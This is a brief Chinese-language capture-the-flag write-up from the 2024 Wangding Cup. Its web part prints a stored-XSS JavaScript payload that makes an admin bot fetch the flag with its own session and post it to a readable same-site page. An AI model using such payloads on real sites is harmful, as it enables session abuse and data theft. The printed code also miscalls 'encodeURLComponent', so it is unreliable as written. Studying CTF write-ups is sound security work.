2024网鼎杯青龙组

misc

具体flag放入github中

https://github.com/k1t0111/Ctf-AWD/tree/k1t0111-wdflag2024-1

web

可以看到首先随便一个登陆页面进去，进到飞机管理清单后台。然后发现了两处功能点。

• 首先写一个清单，作为飞机起飞列表
• 提交清单

思路:

1. 清单提交可以触发xss
2. 使用前端xss 代码提交给boss然后在boss地方触发

<script>
    fetch("flag")
        .then((response) => response.text())
        .then((data) => {
            fetch("/content/a93770ea93dc1f6a2b9d917b62d29db4", {
                method: "POST",
                body: "content=abc" + encodeURLComponent(data),
                headers: { "Content-Type": "application/x-www-form-urlencoded" },
            });
        });
</script>

主体大意就是，因为尝试了boss是无法出网的因此我们使用js，使用boss的cookie 去访问flag。
然后把内容放在data中。同时继续访问另外一个文件将data内容作为post参数传递进去。然后修改hash文件的内容。我们再去访问hash就可以直接访问到flag。

总结最主要还是因为不出网络，因此我们拿不到cookie，因此想到了js功能，让boss自己去访问flag带出flag